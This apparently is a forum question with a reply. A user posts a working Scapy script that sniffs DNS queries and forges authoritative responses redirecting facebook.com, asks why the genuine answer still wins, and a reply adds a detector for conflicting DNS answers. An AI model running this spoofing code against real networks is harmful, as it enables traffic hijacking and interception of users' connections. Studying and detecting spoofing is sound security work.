
I am looking into local DNS spoofing by sniffing DNS requests with Scapy, and sending a spoofed packet in response.

Here is the code I used:

from scapy.all import *

def spoof_dns(pkt):
    # Only react to queries for the target name (qname is bytes in Scapy).
    if DNS in pkt and pkt[DNS].qd is not None and b'facebook.com' in pkt[DNS].qd.qname:
        # Swap addresses and ports so the reply goes back to the querying client.
        IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
        UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)

        # Answer section: one A record for the queried name.
        Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=259200, rdata='127.0.0.1')

        # Authority section: two NS records.
        NSsec1 = DNSRR(rrname='facebook.com', type='NS', ttl=259200, rdata='ns1.facebook.com')
        NSsec2 = DNSRR(rrname='facebook.com', type='NS', ttl=259200, rdata='ns2.facebook.com')

        # Additional section: glue A records for the two name servers.
        Addsec1 = DNSRR(rrname='ns1.facebook.com', type='A', ttl=259200, rdata='1.3.3.7')
        Addsec2 = DNSRR(rrname='ns2.facebook.com', type='A', ttl=259200, rdata='7.3.3.1')

        # Reuse the query's transaction ID and question; qr=1 marks a response, aa=1 claims authority.
        DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,
                     qdcount=1, ancount=1, nscount=2, arcount=2,
                     an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2)

        spoofpkt = IPpkt/UDPpkt/DNSpkt
        send(spoofpkt)

# Sniff outgoing DNS queries and hand each one to spoof_dns.
pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)

Wireshark shows me the following:

> Standard Query 0x0007 A facebook.com
< Standard query Response 0x0007 A facebook.com A 127.0.0.1 NS ns1.facebook.com NS ns2.facebook.com A 1.3.3.7 A 7.3.3.1 (==> My spoofed response)
< Standard query response 0x0007 A facebook.com A 179.60.195.36 (==> The actual response, after mine).

This is the result of running nslookup like this:

> set type=A
> facebook.com
Server:  dns.google
Address:  8.8.8.8

Non-authoritative answer:
Name:    facebook.com
Address:  179.60.195.36

How come nslookup reports 179.60.195.36 as the A record, although we can clearly see in Wireshark that my spoofed packet comes back first?

Wireshark also marks the second (official) packet as a "UDP Retransmission". Are retransmissions given priority over the original?

Nomad
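The capture in the question shows two answers for one transaction ID that disagree, which is exactly the pattern a defender would alert on. As an added example (not code from the question), here is a small detector over decoded DNS responses; the record field names and the 192.0.2.10 client address are assumptions, and the records are constructed to mirror the three Wireshark lines above.

```python
from collections import defaultdict

# Constructed sample of decoded DNS responses, modelled on the Wireshark lines
# in the question: the client (192.0.2.10, a placeholder address) asked 8.8.8.8
# for facebook.com with transaction ID 0x0007 and received two answers.
SAMPLE_RESPONSES = [
    {"src": "8.8.8.8", "dst": "192.0.2.10", "dport": 51234, "id": 0x0007,
     "qname": "facebook.com", "aa": 1, "a_records": ["127.0.0.1"]},      # spoofed reply
    {"src": "8.8.8.8", "dst": "192.0.2.10", "dport": 51234, "id": 0x0007,
     "qname": "facebook.com", "aa": 0, "a_records": ["179.60.195.36"]},  # genuine reply
    {"src": "8.8.8.8", "dst": "192.0.2.10", "dport": 51235, "id": 0x0008,
     "qname": "example.org", "aa": 0, "a_records": ["203.0.113.5"]},     # unrelated, single reply
]


def find_spoofing_signals(responses, recursive_resolvers=("8.8.8.8",)):
    """Return alerts for DNS responses that look spoofed.

    Two signals, both visible in the question's capture:
      1. more than one response for the same (client, port, id, qname)
         transaction whose A records disagree;
      2. a response claiming authority (aa=1) from an address that is a
         recursive resolver, which only returns non-authoritative data.
    """
    by_txn = defaultdict(list)
    for r in responses:
        by_txn[(r["dst"], r["dport"], r["id"], r["qname"])].append(r)

    alerts = []
    for txn, group in by_txn.items():
        answer_sets = {tuple(sorted(r["a_records"])) for r in group}
        if len(group) > 1 and len(answer_sets) > 1:
            alerts.append({"txn": txn, "reason": "conflicting answers",
                           "answers": sorted(answer_sets)})
        for r in group:
            if r["aa"] == 1 and r["src"] in recursive_resolvers:
                alerts.append({"txn": txn, "reason": "aa=1 from recursive resolver",
                               "answers": [tuple(r["a_records"])]})
    return alerts


if __name__ == "__main__":
    for alert in find_spoofing_signals(SAMPLE_RESPONSES):
        print(alert)
```

In a live setup the same function can be fed from a sniffer callback that decodes each response into one of these records; the rogue reply here is the one carrying aa=1 and 127.0.0.1.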